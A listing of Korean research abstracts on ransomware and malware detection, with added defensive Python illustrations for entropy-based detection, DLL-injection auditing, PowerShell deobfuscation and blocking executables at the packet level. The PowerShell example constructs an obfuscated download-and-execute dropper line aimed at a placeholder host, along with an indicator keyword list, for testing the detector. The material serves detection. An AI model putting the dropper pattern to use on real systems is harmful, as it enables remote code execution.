• Title/Summary/Keyword: Ransomware


Design of Intelligent Intrusion Context-aware Inference System for Active Detection and Response (능동적 탐지 대응을 위한 지능적 침입 상황 인식 추론 시스템 설계)

  • Hwang, Yoon-Cheol;Mun, Hyung-Jin
    • Journal of Convergence for Information Technology
    • /
    • v.12 no.4
    • /
    • pp.126-132
    • /
    • 2022
  • At present, due to the rapid spread of smartphones and the activation of IoT, malicious code is disseminated through SNS, and intelligent intrusions such as intelligent APT and ransomware are in progress. The damage caused by intelligent intrusions is also becoming more consequential, threatening and urgent than that of earlier intrusions. Therefore, in this paper, we propose an intelligent intrusion situation-aware reasoning system to detect transgressive behaviour by such intelligent malicious code. The proposed system is used to detect and respond to various intelligent intrusions at an early stage. It is composed of an event monitor, event manager, situation manager, response manager and database; through close interaction between these components it identifies previously recognized intrusive behaviour and learns new invasive activities, a function that improves the performance of the inference engine. In addition, it was found that the proposed system detects and responds to intelligent intrusions, demonstrated on the detection of ransomware, an intelligent intrusion type.
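
The abstract describes the event monitor and situation manager but not the rule by which ransomware is recognised. As an added illustration (not the paper's design), the Python below applies one widely used behavioural signal that such a situation manager could host: a single process writing high-entropy content to many files within a short window while renaming them to an unfamiliar extension. The thresholds, the extension list and the file-event trace are assumptions constructed for the example.

```python
import math
from collections import defaultdict

# Assumed thresholds for the example; not taken from the paper, and tuned per fleet in practice.
WINDOW_SECONDS = 10.0
MIN_FILES = 8
MIN_HIGH_ENTROPY_RATIO = 0.8
HIGH_ENTROPY_BITS = 7.0
SUSPECT_EXTENSIONS = (".locked", ".encrypted", ".crypt")  # illustrative list


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 8.0 for ciphertext, usually 4-6 for documents and source text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def detect_ransomware(events):
    """Map pid -> reason for processes whose recent file activity looks like bulk encryption.

    events: dicts {"t": seconds, "pid": int, "op": "write"|"rename"|"delete",
    "path": str, "data": bytes} ordered by time. A pid is flagged when, within
    WINDOW_SECONDS, it writes high-entropy data to MIN_FILES distinct files and
    also renames a file to one of SUSPECT_EXTENSIONS.
    """
    per_pid = defaultdict(list)
    for ev in events:
        per_pid[ev["pid"]].append(ev)

    alerts = {}
    for pid, evs in per_pid.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["t"] - evs[start]["t"] > WINDOW_SECONDS:
                start += 1                       # slide the window forward
            window = evs[start:end + 1]
            writes = [e for e in window if e["op"] == "write"]
            files = {e["path"] for e in writes}
            if len(files) < MIN_FILES:
                continue
            high = sum(1 for e in writes if shannon_entropy(e["data"]) >= HIGH_ENTROPY_BITS)
            ratio = high / len(writes)
            renamed = any(e["op"] == "rename" and e["path"].lower().endswith(SUSPECT_EXTENSIONS)
                          for e in window)
            if ratio >= MIN_HIGH_ENTROPY_RATIO and renamed:
                alerts[pid] = (f"{len(files)} files rewritten with {ratio:.0%} high-entropy "
                               f"content and renamed to a suspect extension")
                break
    return alerts


def sample_events():
    """Constructed trace, not real telemetry: pid 4242 encrypts documents, pid 1001 saves text notes."""
    ciphertext = bytes(range(256)) * 4                      # entropy exactly 8.0 bits/byte
    plaintext = b"quarterly report draft, section 1 of 3. " * 25
    evs = []
    for i in range(10):
        t = i * 0.5
        evs.append({"t": t, "pid": 4242, "op": "write", "path": f"/home/u/docs/{i}.docx", "data": ciphertext})
        evs.append({"t": t + 0.1, "pid": 4242, "op": "rename", "path": f"/home/u/docs/{i}.docx.locked", "data": b""})
        evs.append({"t": t, "pid": 1001, "op": "write", "path": f"/home/u/notes/{i}.txt", "data": plaintext})
    evs.sort(key=lambda e: e["t"])
    return evs
```

The entropy signal alone misfires on compressed or already-encrypted data (archives, media, backups), which is why the example also requires the rename pattern; a production situation manager would add further events such as canary-file access, shadow-copy deletion and process lineage before the response manager acts.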

A Countermeasure against a Whitelist-based Access Control Bypass Attack Using Dynamic DLL Injection Scheme (동적 DLL 삽입 기술을 이용한 화이트리스트 기반 접근통제 우회공격 대응 방안 연구)

  • Kim, Dae-Youb
    • Journal of IKEEE
    • /
    • v.26 no.3
    • /
    • pp.380-388
    • /
    • 2022
  • Traditional malware detection technologies collect known malicious programs and analyze their characteristics. Such a detection technology then builds a blacklist from the analyzed malicious characteristics and checks the programs in the user's system against the blacklist to determine whether each program is malware. This approach can detect known malicious programs, but responding to unknown or variant malware is challenging. In addition, since such detection technologies generally monitor all programs in the system in real time, they can degrade system performance. To solve these problems, various methods have been proposed to analyze the major behaviours of malicious programs and respond to them. The main characteristic of ransomware is that it accesses and encrypts the user's files. A newer approach is therefore to produce a whitelist of the programs installed in the user's system and allow only the programs on the whitelist to access the user's files. However, even with such an approach, attackers can still perform malicious behaviour by carrying out a DLL (Dynamic-Link Library) injection attack on a legitimate program registered on the whitelist. This paper proposes a method to respond effectively to attacks using DLL injection.
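
The bypass described above works because the whitelist decision is made on the process image while the injected DLL executes inside that trusted process. The following added example (not the paper's method, whose details the abstract does not give) illustrates one countermeasure: baseline the module set of each whitelisted program and grant file access only when every loaded module matches the recorded path and hash. The program path, DLL names, byte contents and the user-writable directory list are constructed for the example.

```python
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def norm(path: str) -> str:
    """Case-fold and use forward slashes so Windows paths compare reliably."""
    return path.lower().replace("\\", "/")


# Constructed stand-ins for file contents; a real agent would hash the DLL bytes on disk.
SYSTEM_DLL = b"MZ constructed stand-in for kernel32.dll"
APP_DLL = b"MZ constructed stand-in for the editor's spell-check plugin"
INJECTED_DLL = b"MZ constructed stand-in for an injected payload DLL"

# Baseline recorded at install time: whitelisted executable -> {module path: SHA-256}.
BASELINE = {
    norm(r"C:\Program Files\Editor\editor.exe"): {
        norm(r"C:\Windows\System32\kernel32.dll"): sha256_hex(SYSTEM_DLL),
        norm(r"C:\Program Files\Editor\plugins\spell.dll"): sha256_hex(APP_DLL),
    },
}

# Directories an unprivileged user can write to; a DLL loaded from here is suspect by itself.
USER_WRITABLE_PREFIXES = ("c:/users/", "c:/programdata/", "c:/windows/temp/")


def audit_modules(exe_path, loaded_modules, baseline=BASELINE):
    """Return [(module_path, reason)] for modules a whitelisted process should not be running.

    loaded_modules is a list of (path, file_bytes) as an endpoint agent would
    snapshot them. Deciding per loaded module, not per process image, means a
    DLL injected into a whitelisted program is caught even though the process
    name and executable hash are unchanged.
    """
    expected = baseline.get(norm(exe_path))
    if expected is None:
        return [(exe_path, "executable not on whitelist")]
    findings = []
    for path, data in loaded_modules:
        p = norm(path)
        if p.startswith(USER_WRITABLE_PREFIXES):
            findings.append((path, "module loaded from user-writable directory"))
        elif p not in expected:
            findings.append((path, "module not in baseline for this program"))
        elif expected[p] != sha256_hex(data):
            findings.append((path, "module hash differs from baseline"))
    return findings


def allow_file_access(exe_path, loaded_modules, baseline=BASELINE) -> bool:
    """Policy hook for the file-access check: allow only when the module set is clean."""
    return not audit_modules(exe_path, loaded_modules, baseline)
```

A real agent would take the snapshot from the operating system's module list at the moment of the file-access request. Note the limit of a file-backed check: reflective injection maps code into the process without a module entry on disk, so memory-region scanning is needed to cover that variant.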

Deobfuscation Processing and Deep Learning-Based Detection Method for PowerShell-Based Malware (파워쉘 기반 악성코드에 대한 역난독화 처리와 딥러닝 기반 탐지 방법)

  • Jung, Ho-jin;Ryu, Hyo-gon;Jo, Kyu-whan;Lee, Sangkyun
    • Journal of the Korea Institute of Information Security & Cryptology
    • /
    • v.32 no.3
    • /
    • pp.501-511
    • /
    • 2022
  • In 2021, ransomware attacks became widespread, and their number is rapidly increasing every year. Since PowerShell is the primary technique used by ransomware, the need for PowerShell-based malware detection is ever increasing. However, existing detection techniques are limited in that they cannot detect obfuscated scripts or require a long processing time for deobfuscation. This paper proposes a simple and fast deobfuscation method and a deep learning-based classification model that can detect PowerShell-based malware. Our model combines Word2Vec with a convolutional neural network to learn the meaning of a script while extracting important features. We tested the proposed model using 1,400 malicious scripts and 8,600 normal scripts provided by the AI-based PowerShell malicious script detection track of the 2021 Cybersecurity AI/Big Data Utilization Contest. Our method achieved deobfuscation 5.04 times faster than existing methods with a perfect success rate, and high detection performance with an FPR of 0.01 and a TPR of 0.965.
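
The abstract names the two stages, deobfuscation and feature extraction, without showing either. The following Python is an added example, not the paper's code: it peels four common obfuscation layers (Base64 -EncodedCommand, [char] arithmetic, string concatenation, backtick escapes) by iterating to a fixed point, then tokenises the result and reports the suspicious tokens a classifier would receive. The sample one-liner, the URL under the reserved .invalid domain and the indicator vocabulary are constructed for the example; the Word2Vec/CNN stage is not reproduced.

```python
import base64
import re

# Obfuscation layers handled here (an illustrative subset, not the paper's full method).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
CHAR_CONCAT_RE = re.compile(r"(?:\[char\]\s*\d+\s*\+\s*)*\[char\]\s*\d+", re.IGNORECASE)
STR_CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
TICK_RE = re.compile(r"`(.)")
TICK_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0"}  # genuine escapes keep their meaning
TOKEN_RE = re.compile(r"-?[a-z_$][\w\-.]*|\d+|\S")

# Constructed indicator vocabulary; a trained model learns weights over all tokens instead.
INDICATORS = {"iex", "invoke-expression", "new-object", "downloadstring", "downloadfile",
              "frombase64string", "invoke-webrequest", "start-process", "hidden", "-nop"}


def _decode_encoded(m):
    """-EncodedCommand carries UTF-16LE text in Base64; leave the text alone if it does not decode."""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:
        return m.group(0)


def _join_chars(m):
    """[char]73+[char]69+[char]88 becomes 'IEX'."""
    return "'" + "".join(chr(int(n)) for n in CHAR_RE.findall(m.group(0))) + "'"


def _merge_strings(m):
    """'Inv'+'oke' becomes 'Invoke' (one pair per pass; the fixed-point loop handles longer chains)."""
    return f"{m.group(1)}{m.group(2)}{m.group(4)}{m.group(1)}"


def _untick(m):
    """Drop the backtick in I`EX while `n, `t, `r and `0 keep their escape meaning."""
    return TICK_ESCAPES.get(m.group(1), m.group(1))


def deobfuscate(script: str, max_rounds: int = 10) -> str:
    """Peel layers until nothing changes; a nested encoding is handled by the next round."""
    text = script
    for _ in range(max_rounds):
        before = text
        text = ENC_RE.sub(_decode_encoded, text)
        text = CHAR_CONCAT_RE.sub(_join_chars, text)
        text = STR_CONCAT_RE.sub(_merge_strings, text)
        text = TICK_RE.sub(_untick, text)
        if text == before:
            break
    return text


def extract_features(script: str):
    """Return (deobfuscated text, lower-cased token list, matched indicators)."""
    clean = deobfuscate(script)
    tokens = TOKEN_RE.findall(clean.lower())
    return clean, tokens, sorted(INDICATORS & set(tokens))


def constructed_sample() -> str:
    """Constructed obfuscated one-liner (not a real-world sample), wrapped in -enc as droppers do."""
    inner = ("& ([char]73+[char]69+[char]88) (('Ne'+'w-Ob'+'ject') \"Net.Web`Client\")"
             ".DownloadString('http://example.invalid/p.ps1')")
    blob = base64.b64encode(inner.encode("utf-16le")).decode("ascii")
    return "powershell -nop -w hidden -enc " + blob
```

Running extract_features(constructed_sample()) yields a script in which IEX, New-Object and Net.WebClient are visible in clear text, which is what makes the token-level model effective; the regular-expression passes are linear in the script length, which is the property the abstract's speed comparison depends on. Techniques not covered here, such as -join over reversed arrays or format-string ({0}{1}) reassembly, would need additional passes of the same shape.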

Empirical Analysis on Bitcoin Price Change by Consumer, Industry and Macro-Economy Variables (비트코인 가격 변화에 관한 실증분석: 소비자, 산업, 그리고 거시변수를 중심으로)

  • Lee, Junsik;Kim, Keon-Woo;Park, Do-Hyung
    • Journal of Intelligence and Information Systems
    • /
    • v.24 no.2
    • /
    • pp.195-220
    • /
    • 2018
  • In this study, we conducted an empirical analysis of the factors that affect the change in the Bitcoin closing price. Previous studies have focused on the security of the blockchain system, the economic ripple effects of cryptocurrency, its legal implications and consumer acceptance of cryptocurrency. Cryptocurrency has been studied in various areas, and many researchers and people, including governments regardless of country, are trying to utilize cryptocurrency and apply its technology. Despite the rapid and dramatic change in cryptocurrency prices and the growth of their effects, empirical study of the factors affecting cryptocurrency price change has been lacking; there were only a few limited studies, business reports and short working papers. Therefore, it is necessary to determine which factors affect the change in the Bitcoin closing price. For the analysis, hypotheses were constructed along three dimensions, consumer, industry and macroeconomy, and time series data were collected for the variables of each dimension. Consumer variables consist of search traffic for Bitcoin, search traffic for a Bitcoin ban, search traffic for ransomware and search traffic for war. Industry variables were composed of GPU vendors' stock prices and memory vendors' stock prices. Macroeconomic variables considered were U.S. dollar index futures, the FOMC policy interest rate and the WTI crude oil price. Using the above variables, we performed a time series regression analysis to find the relationship between those variables and the change in the Bitcoin closing price. Before the regression analysis, we performed a unit-root test to verify the stationarity of the time series data and avoid spurious regression; the regression was then run on the stationary data.
As a result of the analysis, we found that the change in the Bitcoin closing price is negatively affected by search traffic for 'Bitcoin ban' and by U.S. dollar index futures, while changes in GPU vendors' stock prices and in the WTI crude oil price showed positive effects. In the case of 'Bitcoin ban', the term directly concerns the continuation or abolition of Bitcoin trading, which is why consumers reacted sensitively and it affected the change in the Bitcoin closing price. GPUs are the raw material of Bitcoin mining. Generally, an increase in a company's stock price reflects growth in sales of its products and services, so increased GPU demand is indirectly reflected in GPU vendors' stock prices. Interpreting this, a rise in GPU prices has put a crimp on Bitcoin mining; consequently, GPU vendors' stock prices affect the change in the Bitcoin closing price. We also confirmed that U.S. dollar index futures moved in the opposite direction to the change in the Bitcoin closing price. It moved like gold: gold is considered a safe asset by consumers, which suggests that consumers regard Bitcoin as a safe asset. On the other hand, the WTI oil price moved in the same direction as the Bitcoin closing price, implying that Bitcoin is regarded as an investment asset like products on the raw materials market. The variables that were not significant in the analysis were search traffic for Bitcoin, search traffic for ransomware, search traffic for war, memory vendors' stock prices and the FOMC policy interest rate. For search traffic for Bitcoin, we judged that interest in Bitcoin did not lead to purchases of Bitcoin; search traffic for Bitcoin does not reflect all of Bitcoin's demand, which implies that some factors regulate and mediate Bitcoin purchases. For search traffic for ransomware, it is hard to say that concern about ransomware determined overall Bitcoin demand, because only a few people were damaged by ransomware and the percentage of attackers demanding Bitcoin was low; moreover, such information security problems are events rather than continuous issues. Search traffic for war was not significant: as in the stock market, war generally has a negative relation, but in exceptional cases such as the Gulf War it shifts stakeholders' profits and environment, and we think this is the same case. For memory vendors' stock prices, this is because memory vendors' flagship products were not the VRAM that is essential for Bitcoin supply. For the FOMC policy interest rate, when the interest rate is low, surplus capital is invested in securities such as stocks, but Bitcoin's price fluctuation was large, so it is not recognized as an attractive commodity by consumers; in addition, unlike the stock market, Bitcoin has no safety mechanisms such as circuit breakers and sidecars. Through this study, we verified which factors affect the change in the Bitcoin closing price and interpreted why such changes happened. In addition, by establishing the characteristics of Bitcoin as a safe asset and an investment asset, we provide a guide to how consumers, financial institutions and government organizations should approach cryptocurrency. Moreover, by corroborating the factors affecting the change in the Bitcoin closing price, researchers will gain clues as to which factors have to be considered in future cryptocurrency studies.

Analysis of Major and New Ransomware Trends in Korea and Abroad in 2019 (2019 국내·외 주요 및 신규 랜섬웨어 동향 분석)

  • Park, Eunhu;Kim, Soram;Lee, Sehun;Kim, Jongsung
    • Review of KIISC
    • /
    • v.29 no.6
    • /
    • pp.39-48
    • /
    • 2019
  • Ransomware is a portmanteau of ransom and software: it takes over the user's system, encrypts important documents and files, and demands cryptocurrency in exchange for decrypting the encrypted files. Damage from ransomware increases every year, and new ransomware families and variants appear frequently. This paper therefore describes the distribution methods, distribution targets and algorithm usage of ransomware that appeared or was active in 2019, and presents domestic and overseas damage cases. It then examines the five ransomware families with the highest infection rates in each quarter and reports the average ransom demanded. Finally, the distribution routes, characteristics, encryption algorithms, decryption elements and decryption tools of the major and new ransomware families are summarized in a table and described in detail.

Operating principle and preventive measures of Ransomware (랜섬웨어의 동작 원리와 예방 대책)

  • Cho, Young-Ju;Kim, Jin-Hyuk;Oh, Ji-Hoon;So, Youn-Jeong;Sun, A-Young
    • Proceedings of the Korea Contents Association Conference
    • /
    • 2017.05a
    • /
    • pp.91-92
    • /
    • 2017
  • In the developing IoT era, computer use has become closely tied to the lives of modern people. Thanks to computers, we can conveniently produce documents instead of writing each one out by hand on paper. However, because every document is now stored on a computer, a virus has emerged that exploits this: ransomware. This paper examines the meaning and operating principle of ransomware and proposes preventive measures.


A Network Transport System Using Next Generation CCN Technology

  • Lee, Hyung-Su;Park, Jae-Pyo;Park, Jae-Kyung
    • Journal of the Korea Society of Computer and Information
    • /
    • v.22 no.10
    • /
    • pp.93-100
    • /
    • 2017
  • The current Internet has evolved in terms of information sharing and efficiency, but it remains vulnerable: it is not secure from a security standpoint, and its security mechanisms are not safe. Repeated patching against continuous hacking keeps demanding additional resources for network and system equipment, and consequently the costs keep increasing. Crimes such as ransomware, not just simple attacks, are accelerating the damage to businesses and individuals alike, and both need to respond to cyber security. In addition, security devices continue to be introduced and networks separated for the secure transmission of content within the existing TCP/IP system, but security is still lacking. To complement the security shortcomings of the existing TCP/IP Internet protocol, we propose a Secure Contents Transport System (SCTS) on the network using the CCN concept.

Design of a Real-time Risk Analysis System for Ransomware Using Mining based on Social Network Service (소셜 네트워크 서비스 기반 마이닝을 이용한 실시간 랜섬웨어 위험도 분석 시스템 설계)

  • Na, Jaeho;Kim, Mihui
    • Proceedings of the Korea Information Processing Society Conference
    • /
    • 2017.11a
    • /
    • pp.254-256
    • /
    • 2017
  • This paper designs a system that mines Twitter, one of the social network services, to analyze ransomware risk in real time. To this end, tweet data from May 10 to May 20, 2017 is mined, centred on the WannaCry ransomware, which caused the greatest damage on May 12, 2017, and the value of the tweet data is confirmed by an experiment comparing its similarity with the existing system, Google Trends. Finally, future research topics for the proposed system are presented.

Analysis and Countermeasures for the Ransomware Cryptolocker (랜섬웨어 Cryptolocker에 대한 분석과 대응방안)

  • Kim, yongki;Ham, donggyun;Joo, younghwan;Lee, Keun-Ho
    • Proceedings of the Korea Information Processing Society Conference
    • /
    • 2016.04a
    • /
    • pp.292-293
    • /
    • 2016
  • Ransomware is currently emerging as the hottest issue among security problems. Ransomware attacks, which first appeared in Russia, come in almost 4,000 types and have caused 370 million won in damage worldwide. Furthermore, techniques more advanced than the existing attacks continue to appear. This paper analyzes the attack method of the Cryptolocker ransomware. Understanding and analysis of the whole scenario is proposed as the basis for a new plan of countermeasures.

Research on the identification and blocking of known executable files at the network packet level (네트워크 패킷 레벨에서 알려진 실행 파일 식별 및 차단 연구)

  • Jo, Yongsoo;Lee, heejo
    • Proceedings of the Korea Information Processing Society Conference
    • /
    • 2020.05a
    • /
    • pp.177-179
    • /
    • 2020
  • Recent cyber intrusions consist mainly of APT (Advanced Persistent Threat) attacks, which designate a target and attack it persistently, and ransomware attacks. An APT attack induces the download of an unintended file through a drive-by download; the downloaded file creates a reverse communication channel and leaks internal data outward, so the malicious file used in the attack is downloaded and executed without the user's knowledge. Ransomware uses social engineering techniques such as spear phishing to make the user execute a file disguised as coming from a trusted source, and then encrypts important files. Therefore, packet-based security devices located in the network between the user and the attacker need a way to identify and block files downloaded by the user preemptively, preventing the spread of the compromise. This paper studies a method for identifying known malicious files at the network packet level and blocking them in real time.
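
The abstract says files should be identified at the packet level but not how. As an added example (not the paper's method), the Python below reassembles an HTTP response body per flow, recognises a Windows executable from its DOS header and PE signature, hashes the complete body and compares it with a known-bad hash set. The "packets", the minimal PE-shaped blob and the hash set are constructed for the example; the sample registers its own blob as known-bad so that the blocking path is exercised.

```python
import hashlib
import struct


def looks_like_pe(data: bytes) -> bool:
    """True if data starts with a DOS 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return len(data) >= e_lfanew + 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def build_sample_pe() -> bytes:
    """Constructed minimal PE-shaped blob (DOS header, e_lfanew, PE signature, filler). Not a real binary."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)          # e_lfanew: offset of the PE signature
    return bytes(hdr) + b"PE\0\0" + b"\0" * 20 + b"constructed-sample-not-a-real-binary"


# Constructed blocklist: the sample's own hash, standing in for a threat-intel feed of known files.
KNOWN_BAD_SHA256 = {hashlib.sha256(build_sample_pe()).hexdigest()}


class StreamReassembler:
    """Accumulates each flow's HTTP response until Content-Length bytes of body have arrived."""

    def __init__(self):
        self.flows = {}  # flow key -> {"buf", "body_start", "length"}

    def feed(self, flow, payload: bytes):
        """Return the complete body once available, else None."""
        st = self.flows.setdefault(flow, {"buf": bytearray(), "body_start": None, "length": None})
        st["buf"] += payload
        if st["body_start"] is None:
            idx = st["buf"].find(b"\r\n\r\n")
            if idx < 0:
                return None                         # headers not complete yet
            headers = bytes(st["buf"][:idx]).decode("latin-1")
            for line in headers.split("\r\n"):
                if line.lower().startswith("content-length:"):
                    st["length"] = int(line.split(":", 1)[1])
            st["body_start"] = idx + 4
        body = st["buf"][st["body_start"]:]
        if st["length"] is not None and len(body) >= st["length"]:
            return bytes(body[:st["length"]])
        return None


def classify_file(body: bytes):
    """('allow', None) for non-executables; ('block', sha256) if known bad; ('log', sha256) otherwise."""
    if not looks_like_pe(body):
        return ("allow", None)
    digest = hashlib.sha256(body).hexdigest()
    if digest in KNOWN_BAD_SHA256:
        return ("block", digest)
    return ("log", digest)


def run_sample():
    """Feed two constructed flows in 32-byte 'packets' and classify each body once it is complete."""
    pe = build_sample_pe()
    responses = {
        "pe": b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
              b"Content-Length: %d\r\n\r\n" % len(pe) + pe,
        "html": b"HTTP/1.1 200 OK\r\nContent-Length: 13\r\n\r\n<html></html>",
    }
    reasm = StreamReassembler()
    verdicts = {}
    for flow, stream in responses.items():
        for off in range(0, len(stream), 32):
            body = reasm.feed(flow, stream[off:off + 32])
            if body is not None and flow not in verdicts:
                verdicts[flow] = classify_file(body)
    return verdicts
```

Two practical caveats follow from the code: the hash exists only when the last segment arrives, so an inline device blocks by withholding that final segment or resetting the connection rather than by dropping the first packet; and chunked transfer encoding, content compression and TLS are not handled here, so the device must decode or terminate the session before this logic sees the bytes. Matching the "MZ"/"PE" structure rather than the filename also catches executables served with a misleading extension or content type.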